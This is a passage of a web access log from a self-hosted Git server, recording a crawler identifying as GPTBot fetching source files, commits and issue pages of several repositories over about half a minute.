74.7.227.38] [Length 12064] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:18:02:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12067] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:18:02:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/package.json?display=source" [Client 74.7.227.38] [Length 11719] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/package.json" -[17/Feb/2026:18:02:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/tags" [Client 74.7.227.38] [Length 7739] [Gzip 2.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" -[17/Feb/2026:18:02:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10932] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/import%20sys.py" -[17/Feb/2026:18:02:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10932] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/import%20sys.py" -[17/Feb/2026:18:02:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11420] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/import%20sys.py" -[17/Feb/2026:18:02:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11393] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/import%20sys.py" -[17/Feb/2026:18:02:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10933] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/import%20sys.py" -[17/Feb/2026:18:02:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10931] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/import%20sys.py" -[17/Feb/2026:18:02:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/import%20sys.py" -[17/Feb/2026:18:02:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10934] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/import%20sys.py" -[17/Feb/2026:18:02:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10931] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/import%20sys.py" -[17/Feb/2026:18:02:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11420] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/import%20sys.py" -[17/Feb/2026:18:02:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11418] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/import%20sys.py" -[17/Feb/2026:18:02:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10931] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/import%20sys.py" -[17/Feb/2026:18:02:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10983] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:18:02:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11371] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:18:02:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:18:02:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11048] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:18:02:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:18:02:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13009] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:18:02:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10884] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/package.json" -[17/Feb/2026:18:02:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/package.json" -[17/Feb/2026:18:02:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/package.json" -[17/Feb/2026:18:02:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/package.json" -[17/Feb/2026:18:02:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/package.json" -[17/Feb/2026:18:02:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/requirements.txt?display=source" [Client 74.7.227.38] [Length 11320] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/requirements.txt" -[17/Feb/2026:18:02:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/OpcUaMinimal.csproj?display=source" [Client 74.7.227.38] [Length 11732] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/OpcUaMinimal.csproj" -[17/Feb/2026:18:02:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2frequirements.txt" [Client 74.7.227.38] [Length 20406] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/requirements.txt" -[17/Feb/2026:18:02:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=PostgresWatchdog%2flibpq.dll" [Client 74.7.227.38] [Length 23751] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libpq.dll" -[17/Feb/2026:18:02:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fReadMe.txt" [Client 74.7.227.38] [Length 19960] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:18:02:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fchromedriver.exe" [Client 74.7.227.38] [Length 23789] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/chromedriver.exe" -[17/Feb/2026:18:02:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fwatchdog.py" [Client 74.7.227.38] [Length 25244] [Gzip 6.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/watchdog.py" -[17/Feb/2026:18:02:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:02:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:18:02:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&state=open&type=all" [Client 74.7.227.38] [Length 9983] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls" -[17/Feb/2026:18:02:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11027] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:18:02:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11028] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:18:02:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:18:02:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:18:02:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:18:02:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11025] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:18:02:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:18:02:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11024] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:18:02:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11126] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:18:02:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11126] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:18:03:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11124] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:18:03:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11918] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:18:03:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11915] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:18:03:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 11178] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, 